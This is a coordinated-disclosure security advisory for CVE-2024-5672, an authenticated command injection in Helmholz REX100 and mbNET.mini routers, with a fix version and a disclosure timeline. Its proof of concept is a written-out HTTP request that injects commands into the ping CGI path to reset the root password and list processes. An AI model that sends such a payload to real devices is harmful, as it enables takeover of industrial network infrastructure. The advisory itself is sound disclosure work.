Authenticated Command Injection in Helmholz REX100 Router

The Helmholz REX100 Router ist prone to an authenticated command injection attack. This allows an attacker to gain root access on the router, which usually acts as key infrastructure device in OT.

Vendor description

Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access.

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions

Helmholz Industrial Router REX100 <= 2.2.11
MBConnectline mbNET.mini <= 2.2.11

Vulnerability overview

1) Authenticated Command Injection (CVE-2024-5672)

A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Authenticated Command Injection (CVE-2024-5672)

The following GET request changes the password for the root user and returns the process list of the device.

GET /cgi-bin/ping;echo$IFS’root:password’|chpasswd;ps;.sh HTTP/1.1
Host: 192.168.25.11
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
This is haserl version 0.8.0
This program runs as a cgi interpeter, not interactively.
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>
Password for ‚root‘ changed
PID USER VSZ STAT COMMAND
1 root 2292 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
4 root 0 SW [events/0]
5 root 0 SW [khelper]
8 root 0 SW [async/mgr]
[…]

Solution

Update to latest version: 2.2.13

Workaround

None

Recommendation

CyberDanube recommends Helmholz customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.

Contact Timeline

2024-05-15: Contacting Helmholz via psirt@helmholz.de.
2024-05-15: Receiving security contact for MBConnectline.
2024-05-21: Contact stated they are working on a fix.
2024-06-13: Received advisory from contact and assigned CVE number.
2024-07-01: Contact sends out final release date.
2024-07-03: Coordinated release of advisory with CERT@VDE.

Author(s)

Sebastian Dietz

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.